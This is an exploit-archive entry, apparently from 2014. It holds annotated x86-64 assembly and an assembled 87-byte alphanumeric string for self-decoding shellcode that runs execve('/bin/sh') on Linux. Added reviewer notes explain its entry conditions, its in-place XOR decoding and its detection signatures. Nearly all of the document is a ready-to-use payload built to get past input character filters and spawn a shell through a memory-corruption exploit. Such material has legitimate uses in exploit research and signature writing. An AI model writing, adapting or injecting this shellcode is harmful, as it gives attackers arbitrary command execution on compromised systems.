#Title: Position independent & Alphanumeric 64-bit execve("/bin/sh\0",NULL,NULL); (87 bytes)
#Author: Breaking.Technology
#Date: 06 November 2014
#Vendor Homepage: http://breaking.technology
#Version: x86-64 platforms
#Classification: 64 bit shellcode
#Shellcode: http://breaking.technology/shellcode/alpha64-binsh.txt

# Position independent & Alphanumeric 64-bit execve("/bin/sh\0",NULL,NULL); (87 bytes)
# This shellcode will successfully execute every time as long as it is returned to.
# (c) 2014 Breaking Technology, Inc.
# http://breaking.technology/
#
# Assembled (87 bytes):
# XXj0TYX45Pk13VX40473At1At1qu1qv1qwHcyt14yH34yhj5XVX1FK1FSH3FOPTj0X40PP4u4NZ4jWSEW18EF0V
#
# Assembly:
# user@host $ as alpha64-binsh.s -o alpha64-binsh.o ; strings alpha64-binsh.o
#
# Reviewer notes (syntax, ABI and preconditions, all derived from the code below):
#   Syntax:   GNU as, AT&T operand order (src, dst).  '#' starts a comment; a ';'
#             inside the comments below is plain text, not a statement separator.
#   Target:   Linux x86-64.  The only system call is nr 0x3b (execve), arguments
#             in %rdi (path), %rsi (argv), %rdx (envp).
#   Entry:    control must arrive via `ret`: at _start the slot at -8(%rsp) still
#             holds the popped return address (the shellcode's own address), which
#             get_return_pointer reads back into %rsi.  Entering by call/jmp breaks it.
#   Memory:   decode_encoded_code and decode_encoded_data XOR the shellcode's own
#             bytes in place, so the buffer must be writable AND executable.  Under
#             NX / W^X the first of those stores faults and the decoded bytes never run.
#   Stack:    stores reach roughly 0x80 bytes above the entry %rsp (caller's frame)
#             and pushes descend to 24 bytes below it.
#   Why the xor pairs: every byte must be in [0-9A-Za-z], so plain mov/syscall
#             encodings are unavailable; "xor mem,reg ; xor reg,mem" acts as a mov
#             that is correct regardless of what the memory held beforehand.
#   Detection: the 87-byte string above is a fixed byte sequence (static signature);
#             the in-place decode is a write to an executable mapping at run time.

.section .data                          # nothing is placed here; all data lives inline in .text

.section .text
.globl _start

# Register roles, valid from prepare_ff onwards:
#   %rcx = scratch base on the stack (points at the pushed 0x30 / 0x05 slot)
#   %rsi = 0x000000ff byte mask, later the address of _start
#   %rdi = -8 (sign-extended index), later the "/bin/sh\0" pointer
#   %rax = scratch; ends as the syscall number 0x3b
_start:                                 # "XX"
        pop     %rax                    # 'X'  add $0x8, %rsp ; so we don't overwrite the return pointer
        pop     %rax                    # 'X'  add $0x8, %rsp ; so we don't overwrite the return pointer
        # The two pops move %rsp 16 bytes above the return-address slot so the
        # pushes below do not clobber it before get_return_pointer reads it.

prepare_ff:                             # "j0TYX45Pk13"
        push    $0x30                   # 'j0'
        push    %rsp                    # 'T'
        pop     %rcx                    # 'Y'   %rcx points to $0x30
        pop     %rax                    # 'X'   %rax = 0x30
        xor     $0x35, %al              # '45'  %rax = 0x05
        push    %rax                    # 'P'   (%rcx) = 0x05
        imul    $0x33, (%rcx), %esi     # 'k13' %esi = 0x05 * 0x33 = 0x000000ff

prepare_f8:                             # "VX4047"
        # mov %rsi, %rax
        push    %rsi                    # 'V'
        pop     %rax                    # 'X'   %rax = %rsi = 0x000000ff
        # mov $0xf8, %al
        xor     $0x30, %al              # '40'
        xor     $0x37, %al              # '47'  %rax = 0x000000f8

write_negative_8:                       # "3At1At1qu1qv1qw"
        # mov %eax, 0x74(%rcx) -- xor-in then xor-out: the dword at 0x74(%rcx)
        # ends up equal to %eax whatever it held before.
        xor     0x74(%rcx), %eax        # '3At'
        xor     %eax, 0x74(%rcx)        # '1At' bytes 0x74..0x77 = f8 00 00 00
        # mov %sil, 0x75 - 0x77 + rcx -- %esi = 0x000000ff, so each dword xor
        # flips only the low byte at that offset (the store itself spans to 0x7a).
        xor     %esi, 0x75(%rcx)        # '1qu' 0xff
        xor     %esi, 0x76(%rcx)        # '1qv' 0xff
        xor     %esi, 0x77(%rcx)        # '1qw' 0xff
        # -8 (0xfffffff8) is now on the stack as a 32-bit dword at 0x74(%rcx)

read_negative_8:                        # "Hcyt"
        # move long (dword) to signed quadword: mov $-8, %rdi
        movslq  0x74(%rcx), %rdi        # 'Hcyt' %rdi is now -0x8 ( 0xfffffffffffffff8 )

get_return_pointer:                     # "14yH34y"
        # mov -0x10(%rcx), %rsi  <--- THIS IS OUR RETURN POINTER / LOCATION OF short_pc_rsi
        # or in decimal: mov -16(%rcx), %rsi
        # %rcx + %rdi*2 = %rcx - 16 = the slot the `ret` popped, i.e. the address
        # of _start.  Same xor-in/xor-out trick as above; the read back is 64-bit.
        xor     %esi, (%rcx, %rdi, 2)   # '14y'
        xor     (%rcx, %rdi, 2), %rsi   # 'H34y' %rsi = address of _start

prepare_key:                            # "hj5XVX"
        # put the xor key into %eax
        push    $0x5658356a             # 'hj5XV' little-endian: in memory the key bytes are 6a 35 58 56
        pop     %rax                    # 'X'

decode_encoded_code:                    # "1FK"
        # Self-modifying store into the shellcode's own bytes at %rsi + 0x4b.
        xor     %eax, 0x4b(%rsi)        # '1FK'  encoded_code ; pops & syscall decoded

decode_encoded_data:                    # "1FSH3FO"
        xor     %eax, 0x53(%rsi)        # '1FS'  encoded_data + 4 ; "/sh\0" decoded in place
        xor     0x4f(%rsi), %rax        # 'H3FO' encoded_data ; "/bin/sh\0" now in %rax (key ^ "EW18" = "/bin")

begin_stack_setup:                      # "PT"
        push    %rax                    # 'P'  push "/bin/sh\0"
        push    %rsp                    # 'T'  push pointer to /bin/sh (reuses the return-address slot, already read)

zero_rax:                               # "j0X40"
        # xor %rax, %rax
        push    $0x30                   # 'j0'
        pop     %rax                    # 'X'
        xor     $0x30, %al              # '40'  %rax is NULL

end_stack_setup:                        # "PP"
        push    %rax                    # 'P'  push NULL
        push    %rax                    # 'P'  push NULL

mov_3b_al:                              # "4u4N"
        # mov $0x3b, %al
        xor     $0x75, %al              # '4u'
        xor     $0x4e, %al              # '4N'  %al = 0x75 xor 0x4e = 0x3b
        # this is the syscall number for execve ^

begin_stack_run:                        # "Z"
        pop     %rdx                    # 'Z'  mov $0x00, %rdx ; %rdx = NULL (envp)

encoded_code:                           # "4jWS"
        # 0x34 0x6a 0x57 0x53; after the xor with key bytes 6a 35 58 56:
        .byte   0x34                    # "\x5e" pop %rsi  ; %rsi = NULL (argv)
        .byte   0x6a                    # "\x5f" pop %rdi  ; %rdi = pointer to "/bin/sh\0"
        .byte   0x57                    # "\x0f"
        .byte   0x53                    # "\x05" syscall   ; execve("/bin/sh\0",NULL,NULL);
        # syscall(%rax) = function(%rdi,%rsi,%rdx);
        # syscall(0x3b) = execve("/bin/sh\0",NULL,NULL);

encoded_data:                           # "EW18EF0V" turns into "/bin/sh\0"
        # 0x45 0x57 0x31 0x38 0x45 0x46 0x30 0x56
        # Only the last four bytes are decoded in memory; the first four are
        # decoded into %rax alone (see decode_encoded_data).
        .byte   0x45                    # /
        .byte   0x57                    # b
        .byte   0x31                    # i
        .byte   0x38                    # n
        .byte   0x45                    # /
        .byte   0x46                    # s
        .byte   0x30                    # h
        .byte   0x56                    # \0